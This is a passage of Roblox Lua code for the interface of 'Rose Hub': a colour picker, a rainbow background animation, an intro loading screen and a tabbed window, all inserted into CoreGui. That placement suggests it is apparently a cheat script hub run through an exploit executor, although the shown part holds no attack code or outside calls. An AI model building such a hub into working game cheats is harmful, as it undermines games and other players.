CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick90}) local ColorPick97 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick96}) local ColorPick98 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick97}) local ColorPick99 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick97}) local ColorPick100 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick97}) local ColorPick101 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Blue:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick88}) local ColorPick102 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="OK",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.18823531270027,0.18823531270027,0.18823531270027),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-210,1,-28),Rotation=0,Selectable=true,Size=UDim2.new(0,100,0,25),SizeConstraint=0,Visible=true,ZIndex=1,Name="Ok",Parent = ColorPick3}) local ColorPick103 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="Cancel",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.18823531270027,0.18823531270027,0.18823531270027),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-105,1,-28),Rotation=0,Selectable=true,Size=UDim2.new(0,100,0,25),SizeConstraint=0,Visible=true,ZIndex=1,Name="Cancel",Parent = ColorPick3}) local ColorPick104 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,5,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,180,0,200),SizeConstraint=0,Visible=true,ZIndex=1,Name="BasicColors",Parent = ColorPick3}) local ColorPick105 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Basic Colors",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,-5),Rotation=0,Selectable=false,Size=UDim2.new(1,0,0,26),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick104}) local ColorPick106 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,5,0,210),Rotation=0,Selectable=false,Size=UDim2.new(0,180,0,90),SizeConstraint=0,Visible=true,ZIndex=1,Name="CustomColors",Parent = ColorPick3}) local ColorPick107 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Custom Colors (RC = Set)",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(1,0,0,20),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick106}) local ColorPick108 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.fromRGB(84, 84, 84),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(1,0,0,25),SizeConstraint=0,Visible=true,ZIndex=1,Name="TopBar",Parent = ColorPick2}) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", ColorPick108, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) local ColorPick109 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Color Picker",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,25,0,0),Rotation=0,Selectable=false,Size=UDim2.new(1,-50,0,25),SizeConstraint=0,Visible=true,ZIndex=1,Name="WindowTitle",Parent = ColorPick108}) local ColorPick110 = CreateInstance("TextButton",{Font=4,FontSize=5,Text="X",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-27,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,25,0,25),SizeConstraint=0,Visible=true,ZIndex=1,Name="Close",Parent = ColorPick108}) return ColorPick end local GuiTemplate = createColorPick() ColorPicker.new = function() pickerCreated = true local newMt = setmetatable({},{}) local rootGui = GuiTemplate:Clone() rootGui.Parent = coreGui rootGui.Enabled = true pickerGui = rootGui.ColorPicker local pickerTopBar = pickerGui.TopBar backDrop = pickerGui.Backdrop local pickerFrame = pickerGui.Backdrop.Content local colorSpace = pickerFrame.ColorSpaceFrame.ColorSpace local colorStrip = pickerFrame.ColorStrip local previewFrame = pickerFrame.Preview local basicColorsFrame = pickerFrame.BasicColors local customColorsFrame = pickerFrame.CustomColors local okButton = pickerFrame.Ok local cancelButton = pickerFrame.Cancel local closeButton = pickerTopBar.Close local colorScope = colorSpace.Scope local colorArrow = pickerFrame.ArrowFrame.Arrow local hueInput = pickerFrame.Hue.Input local satInput = pickerFrame.Sat.Input local valInput = pickerFrame.Val.Input local redInput = pickerFrame.Red.Input local greenInput = pickerFrame.Green.Input local blueInput = pickerFrame.Blue.Input local user = game:GetService("UserInputService") local mouse = game:GetService("Players").LocalPlayer:GetMouse() local hue,sat,val = Color3.toHSV(savedColor) local red,green,blue = savedColor.r, savedColor.g, savedColor.b local chosenColor = savedColor local basicColors = {Color3.new(0,0,0),Color3.new(0.66666668653488,0,0),Color3.new(0,0.33333334326744,0),Color3.new(0.66666668653488,0.33333334326744,0),Color3.new(0,0.66666668653488,0),Color3.new(0.66666668653488,0.66666668653488,0),Color3.new(0,1,0),Color3.new(0.66666668653488,1,0),Color3.new(0,0,0.49803924560547),Color3.new(0.66666668653488,0,0.49803924560547),Color3.new(0,0.33333334326744,0.49803924560547),Color3.new(0.66666668653488,0.33333334326744,0.49803924560547),Color3.new(0,0.66666668653488,0.49803924560547),Color3.new(0.66666668653488,0.66666668653488,0.49803924560547),Color3.new(0,1,0.49803924560547),Color3.new(0.66666668653488,1,0.49803924560547),Color3.new(0,0,1),Color3.new(0.66666668653488,0,1),Color3.new(0,0.33333334326744,1),Color3.new(0.66666668653488,0.33333334326744,1),Color3.new(0,0.66666668653488,1),Color3.new(0.66666668653488,0.66666668653488,1),Color3.new(0,1,1),Color3.new(0.66666668653488,1,1),Color3.new(0.33333334326744,0,0),Color3.new(1,0,0),Color3.new(0.33333334326744,0.33333334326744,0),Color3.new(1,0.33333334326744,0),Color3.new(0.33333334326744,0.66666668653488,0),Color3.new(1,0.66666668653488,0),Color3.new(0.33333334326744,1,0),Color3.new(1,1,0),Color3.new(0.33333334326744,0,0.49803924560547),Color3.new(1,0,0.49803924560547),Color3.new(0.33333334326744,0.33333334326744,0.49803924560547),Color3.new(1,0.33333334326744,0.49803924560547),Color3.new(0.33333334326744,0.66666668653488,0.49803924560547),Color3.new(1,0.66666668653488,0.49803924560547),Color3.new(0.33333334326744,1,0.49803924560547),Color3.new(1,1,0.49803924560547),Color3.new(0.33333334326744,0,1),Color3.new(1,0,1),Color3.new(0.33333334326744,0.33333334326744,1),Color3.new(1,0.33333334326744,1),Color3.new(0.33333334326744,0.66666668653488,1),Color3.new(1,0.66666668653488,1),Color3.new(0.33333334326744,1,1),Color3.new(1,1,1)} local customColors = {} local function updateColor(noupdate) local relativeX,relativeY,relativeStripY = 219 - hue*219, 199 - sat*199, 199 - val*199 local hsvColor = Color3.fromHSV(hue,sat,val) if noupdate == 2 or not noupdate then hueInput.Text = tostring(math.ceil(359*hue)) satInput.Text = tostring(math.ceil(255*sat)) valInput.Text = tostring(math.floor(255*val)) end if noupdate == 1 or not noupdate then redInput.Text = tostring(math.floor(255*red)) greenInput.Text = tostring(math.floor(255*green)) blueInput.Text = tostring(math.floor(255*blue)) end chosenColor = Color3.new(red,green,blue) colorScope.Position = UDim2.new(0,relativeX-9,0,relativeY-9) colorStrip.ImageColor3 = Color3.fromHSV(hue,sat,1) colorArrow.Position = UDim2.new(0,-2,0,relativeStripY-4) previewFrame.BackgroundColor3 = chosenColor updateBack(chosenColor, backDrop) newMt.Color = chosenColor if newMt.Changed then newMt:Changed(chosenColor) end end local function colorSpaceInput() local relativeX = mouse.X - colorSpace.AbsolutePosition.X local relativeY = mouse.Y - colorSpace.AbsolutePosition.Y if relativeX < 0 then relativeX = 0 elseif relativeX > 219 then relativeX = 219 end if relativeY < 0 then relativeY = 0 elseif relativeY > 199 then relativeY = 199 end hue = (219 - relativeX)/219 sat = (199 - relativeY)/199 local hsvColor = Color3.fromHSV(hue,sat,val) red,green,blue = hsvColor.r,hsvColor.g,hsvColor.b updateColor() end local function colorStripInput() local relativeY = mouse.Y - colorStrip.AbsolutePosition.Y if relativeY < 0 then relativeY = 0 elseif relativeY > 199 then relativeY = 199 end val = (199 - relativeY)/199 local hsvColor = Color3.fromHSV(hue,sat,val) red,green,blue = hsvColor.r,hsvColor.g,hsvColor.b updateColor() end local function hookButtons(frame,func) frame.ArrowFrame.Up.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then frame.ArrowFrame.Up.BackgroundTransparency = 0.5 elseif input.UserInputType == Enum.UserInputType.MouseButton1 then local releaseEvent,runEvent local startTime = tick() local pressing = true local startNum = tonumber(frame.Text) if not startNum then return end releaseEvent = user.InputEnded:Connect(function(input) if input.UserInputType ~= Enum.UserInputType.MouseButton1 then return end releaseEvent:Disconnect() pressing = false end) startNum = startNum + 1 func(startNum) while pressing do if tick()-startTime > 0.3 then startNum = startNum + 1 func(startNum) end wait(0.1) end end end) frame.ArrowFrame.Up.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then frame.ArrowFrame.Up.BackgroundTransparency = 1 end end) frame.ArrowFrame.Down.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then frame.ArrowFrame.Down.BackgroundTransparency = 0.5 elseif input.UserInputType == Enum.UserInputType.MouseButton1 then local releaseEvent,runEvent local startTime = tick() local pressing = true local startNum = tonumber(frame.Text) if not startNum then return end releaseEvent = user.InputEnded:Connect(function(input) if input.UserInputType ~= Enum.UserInputType.MouseButton1 then return end releaseEvent:Disconnect() pressing = false end) startNum = startNum - 1 func(startNum) while pressing do if tick()-startTime > 0.3 then startNum = startNum - 1 func(startNum) end wait(0.1) end end end) frame.ArrowFrame.Down.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then frame.ArrowFrame.Down.BackgroundTransparency = 1 end end) end colorSpace.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 then local releaseEvent,mouseEvent releaseEvent = user.InputEnded:Connect(function(input) if input.UserInputType ~= Enum.UserInputType.MouseButton1 then return end releaseEvent:Disconnect() mouseEvent:Disconnect() end) mouseEvent = user.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then colorSpaceInput() end end) colorSpaceInput() end end) colorStrip.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 then local releaseEvent,mouseEvent releaseEvent = user.InputEnded:Connect(function(input) if input.UserInputType ~= Enum.UserInputType.MouseButton1 then return end releaseEvent:Disconnect() mouseEvent:Disconnect() end) mouseEvent = user.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then colorStripInput() end end) colorStripInput() end end) local function updateHue(str) local num = tonumber(str) if num then hue = math.clamp(math.floor(num),0,359)/359 local hsvColor = Color3.fromHSV(hue,sat,val) red,green,blue = hsvColor.r,hsvColor.g,hsvColor.b hueInput.Text = tostring(hue*359) updateColor(1) end end hueInput.FocusLost:Connect(function() updateHue(hueInput.Text) end) hookButtons(hueInput,updateHue) local function updateSat(str) local num = tonumber(str) if num then sat = math.clamp(math.floor(num),0,255)/255 local hsvColor = Color3.fromHSV(hue,sat,val) red,green,blue = hsvColor.r,hsvColor.g,hsvColor.b satInput.Text = tostring(sat*255) updateColor(1) end end satInput.FocusLost:Connect(function() updateSat(satInput.Text) end) hookButtons(satInput,updateSat) local function updateVal(str) local num = tonumber(str) if num then val = math.clamp(math.floor(num),0,255)/255 local hsvColor = Color3.fromHSV(hue,sat,val) red,green,blue = hsvColor.r,hsvColor.g,hsvColor.b valInput.Text = tostring(val*255) updateColor(1) end end valInput.FocusLost:Connect(function() updateVal(valInput.Text) end) hookButtons(valInput,updateVal) local function updateRed(str) local num = tonumber(str) if num then red = math.clamp(math.floor(num),0,255)/255 local newColor = Color3.new(red,green,blue) hue,sat,val = Color3.toHSV(newColor) redInput.Text = tostring(red*255) updateColor(2) end end redInput.FocusLost:Connect(function() updateRed(redInput.Text) end) hookButtons(redInput,updateRed) local function updateGreen(str) local num = tonumber(str) if num then green = math.clamp(math.floor(num),0,255)/255 local newColor = Color3.new(red,green,blue) hue,sat,val = Color3.toHSV(newColor) greenInput.Text = tostring(green*255) updateColor(2) end end greenInput.FocusLost:Connect(function() updateGreen(greenInput.Text) end) hookButtons(greenInput,updateGreen) local function updateBlue(str) local num = tonumber(str) if num then blue = math.clamp(math.floor(num),0,255)/255 local newColor = Color3.new(red,green,blue) hue,sat,val = Color3.toHSV(newColor) blueInput.Text = tostring(blue*255) updateColor(2) end end blueInput.FocusLost:Connect(function() updateBlue(blueInput.Text) end) hookButtons(blueInput,updateBlue) local colorChoice = Instance.new("TextButton") colorChoice.Name = "Choice" colorChoice.Size = UDim2.new(0,25,0,18) colorChoice.BorderColor3 = Color3.new(96/255,96/255,96/255) colorChoice.Text = "" colorChoice.AutoButtonColor = false local row = 0 local column = 0 for i,v in pairs(basicColors) do local newColor = colorChoice:Clone() newColor.BackgroundColor3 = v newColor.Position = UDim2.new(0,1 + 30*column,0,21 + 23*row) newColor.MouseButton1Click:Connect(function() red,green,blue = v.r,v.g,v.b local newColor = Color3.new(red,green,blue) hue,sat,val = Color3.toHSV(newColor) updateColor() end) newColor.Parent = basicColorsFrame column = column + 1 if column == 6 then row = row + 1 column = 0 end end row = 0 column = 0 for i = 1,12 do local color = customColors[i] or Color3.new(0,0,0) local newColor = colorChoice:Clone() newColor.BackgroundColor3 = color newColor.Position = UDim2.new(0,1 + 30*column,0,20 + 23*row) newColor.MouseButton1Click:Connect(function() local curColor = customColors[i] or Color3.new(0,0,0) red,green,blue = curColor.r,curColor.g,curColor.b hue,sat,val = Color3.toHSV(curColor) updateColor() end) newColor.MouseButton2Click:Connect(function() customColors[i] = chosenColor newColor.BackgroundColor3 = chosenColor end) newColor.Parent = customColorsFrame column = column + 1 if column == 6 then row = row + 1 column = 0 end end pickerTopBar.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 then local releaseEvent,mouseEvent local dragOffX,dragOffY = mouse.X-pickerTopBar.AbsolutePosition.X,mouse.Y-pickerTopBar.AbsolutePosition.Y releaseEvent = user.InputEnded:Connect(function(input) if input.UserInputType ~= Enum.UserInputType.MouseButton1 then return end releaseEvent:Disconnect() mouseEvent:Disconnect() end) mouseEvent = user.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then pickerGui.Position = UDim2.new(0,mouse.X-dragOffX,0,mouse.Y-dragOffY) end end) end end) okButton.MouseButton1Click:Connect(function() if newMt.Confirm then newMt:Confirm(chosenColor) end pickerGui.Visible = false savedColor = chosenColor colorPickerOpen = false end) okButton.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then okButton.BackgroundTransparency = 0.4 end end) okButton.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then okButton.BackgroundTransparency = 0 end end) cancelButton.MouseButton1Click:Connect(function() if newMt.Cancel then newMt:Cancel() end pickerGui.Visible = false updateBack(savedColor, backDrop) colorPickerOpen = false end) cancelButton.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then cancelButton.BackgroundTransparency = 0.4 end end) cancelButton.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement then cancelButton.BackgroundTransparency = 0 end end) closeButton.MouseButton1Click:Connect(function() pickerGui.Visible = false updateBack(savedColor, backDrop) colorPickerOpen = false end) updateColor() newMt.SetColor = function(self,color) red,green,blue = color.r,color.g,color.b hue,sat,val = Color3.toHSV(color) updateColor() end newMt.Gui = rootGui return newMt end end local rainbowColors = { Color3.fromRGB(0, 0, 255), Color3.fromRGB(255, 0, 0), Color3.fromRGB(255, 255, 0), Color3.fromRGB(0, 255, 0), Color3.fromRGB(0, 255, 255), } local rainbow = false local customRainbow = false local rainbowReset = false local rainbowStart = 1 local currentRainbow = nil spawn(function() while wait() do if rainbow == true then for i,v in pairs(rainbowColors) do local start = rainbowColors[i] local rEnd = i + 1 if not rainbowColors[rEnd] then rEnd = 1 end if customRainbow == true then local back = screenGui.Top.Main.BackgroundColor3 start = back end for num = rainbowCount, 1, -1 do currentRainbow = start:Lerp(rainbowColors[rEnd], (rainbowCount - num)/rainbowCount) if rainbow == true then updateBack(currentRainbow) else break end wait() end customRainbow = false end if rainbowReset == true then rainbowReset = false rainbow = false currentRainbow = screenGui.Top.Main.BackgroundColor3 for num = rainbowCount, 1, -1 do currentRainbow = currentRainbow:Lerp(savedColor, (rainbowCount - num)/rainbowCount) updateBack(currentRainbow) if rainbow == true then rainbowReset = false break end wait() end wait() end end end end) --Intro screenGui = Instance.new("ScreenGui") screenGui.Parent = coreGui screenGui.Name = "Introooo" screenGui.Enabled = false createFrame(false, Color3.fromRGB(59, 59, 59), 0, 0, true, "Intro", screenGui, UDim2.new(0.5, -188, 0.5, -84), UDim2.new(0, 376, 0, 169)) createTextLabel(Color3.fromRGB(84, 84, 84), 0, 0, Enum.Font.SourceSansBold, "Top", screenGui.Intro, UDim2.new(0, 0, 0, 0), UDim2.new(0, 376, 0, 25), " Rose Hub ", Color3.fromRGB(255, 255, 255), 25, true, Enum.TextXAlignment.Center, Enum.TextYAlignment.Top, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Intro.Top, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextLabel(Color3.fromRGB(255, 255, 255), 1, 1, Enum.Font.SourceSansBold, "Loading", screenGui.Intro, UDim2.new(0, 88, 0, 139), UDim2.new(0, 200, 0, 30), "Loading...", Color3.fromRGB(255, 255, 255), 20, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createTextLabel(Color3.fromRGB(255, 255, 255), 1, 1, Enum.Font.SourceSansBold, "Motto", screenGui.Intro, UDim2.new(0, 88, 0, 25), UDim2.new(0, 200, 0, 33), [["Innovating Creativity"]], Color3.fromRGB(255, 255, 255), 17, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createFrame(false, Color3.fromRGB(255, 255, 255), 0.65, 1, false, "Background", screenGui.Intro, UDim2.new(0, 19, 0, 75), UDim2.new(0, 338, 0, 33)) createFrame(false, Color3.fromRGB(255, 255, 255), 0, 0, false, "Bar", screenGui.Intro.Background, UDim2.new(0, 0, 0, 0), UDim2.new(0, 0, 0, 33)) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Intro.Background, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) tweening = true screenGui.Intro.Size = UDim2.new(0, 0, 0, 25) wait() screenGui.Enabled = true screenGui.Intro:TweenSize(UDim2.new(0, 376, 0, 25), "Out", "Quad", 0.5) wait(0.5) wait() screenGui.Intro:TweenSize(UDim2.new(0, 376, 0, 169), "Out", "Quad", 0.5) wait(0.5) screenGui.Intro.Background.Bar:TweenSize(UDim2.new(1, 0, 0, 33), "Out", "Quad", 3) intro = screenGui --Create Gui gui = Instance.new("ScreenGui") gui.Parent = coreGui gui.Name = "RoseHub" gui.Enabled = false local uiScale = Instance.new("UIScale") uiScale.Scale = 1.1 uiScale.Parent = gui createFrame(true, Color3.fromRGB(255, 255, 255), 1, 0, false, "Main", gui, UDim2.new(0.5, -180, 0.5, -172), UDim2.new(0, 361, 0, 344)) gui.Main.Active = true gui.Main.Draggable = true gui.Main.ClipsDescendants = true createTextButton(Color3.fromRGB(84, 84, 84), 0, 0, Enum.Font.SourceSansBold, "Open", gui, UDim2.new(0, 0, 0.75, 0), UDim2.new(0, 75, 0, 30), "Open", textColor, 14, 1, function() if tweening == false then tweening = true gui.Open:TweenPosition(UDim2.new(0, -75, 0.75, 0), "Out", "Quad", 0.25) wait(0.25) gui.Main:TweenSize(UDim2.new(0, 361, 0, 31), "Out", "Quad", 0.5) wait(0.5) wait() gui.Main:TweenSize(UDim2.new(0, 361, 0, 347), "Out", "Quad", 0.5) wait(0.5) tweening = false end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", gui.Open, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) screenGui = gui.Main createFrame(true, Color3.fromRGB(84, 84, 84), 0, 0, false, "Top", screenGui, UDim2.new(0, 0, 0, 0), UDim2.new(0, 361, 0, 31)) createFrame(false, savedColor, 0, 0, false, "Main", screenGui.Top, UDim2.new(0, 0, 0.984, 0), UDim2.new(0, 361, 0, 313)) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Main, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createFrame(false, Color3.fromRGB(117, 117, 117), 0.5, 0, false, "Tabs", screenGui.Top, UDim2.new(0, 0, 1, 0), UDim2.new(0, 110, 0, 313)) createFrame(false, backColor, 1, 0, true, "Important", screenGui.Top, UDim2.new(0.36, 0, 1.516, 0), UDim2.new(0, 211, 0, 281)) local underline = createFrame(false, backColor, 0, 0, false, "Frame", screenGui.Top.Tabs, UDim2.new(0, 20, 0, 25), UDim2.new(0, 70, 0, 2)) --Create Tabs Function local tabPos = 0 local oldTab = tabs[1] for _,tab in pairs(tabs) do local tabFrame = createFrame(false, Color3.fromRGB(117, 117, 117), 0.75, 0, false, tab.."Tab", screenGui.Top.Important, UDim2.new(-1, 0, 0, 0), UDim2.new(0, 211, 0, 281)) local tweenPos = tabPos + 22 createTextButton(backColor, 1, 1, Enum.Font.SourceSansBold, tab, screenGui.Top.Tabs, UDim2.new(0, 0, 0, tabPos), UDim2.new(0, 110, 0, 26), tab, textColor, 14, 1, function() if tweening == false and tab ~= oldTab then tweening = true underline:TweenSizeAndPosition(UDim2.new(0, 2, 0, 0), UDim2.new(0, 55, 0, underline.Position.Y.Offset), "Out", "Quad", tweenSpeed) local newUnderline = createFrame(false, backColor, 0, 0, false, "Frame", screenGui.Top.Tabs, UDim2.new(0, 55, 0, tweenPos), UDim2.new(0, 0, 0, 2)) newUnderline:TweenSizeAndPosition(UDim2.new(0, screenGui.Top.Tabs[tab].TextBounds.X, 0, 2), UDim2.new(0, 55 - screenGui.Top.Tabs[tab].TextBounds.X/2, 0, tweenPos), "Out", "Quad", tweenSpeed) screenGui.Top.Important[oldTab.."Tab"]:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Quad", tweenSpeed) screenGui.Top.Important[tab.."Tab"]:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Quad", tweenSpeed) screenGui.Top.CurrentTab:TweenSize(UDim2.new(0, 0, 0, 31), "Out", "Quad", tweenSpeed/2) wait(tweenSpeed/2) screenGui.Top.CurrentTab.Label.Text = tab screenGui.Top.CurrentTab:TweenSize(UDim2.new(0, 109, 0, 31), "Out", "Quad", tweenSpeed/2) wait(tweenSpeed/2) screenGui.Top.Important[oldTab.."Tab"].Position = UDim2.new(-1, 0, 0, 0) underline:Destroy() underline = newUnderline oldTab = tab tweening = false end end) tabPos = tabPos + 26 end screenGui.Top.Important[tabs[1].."Tab"].Position = UDim2.new(0, 0, 0, 0) underline.Size = UDim2.new(0, 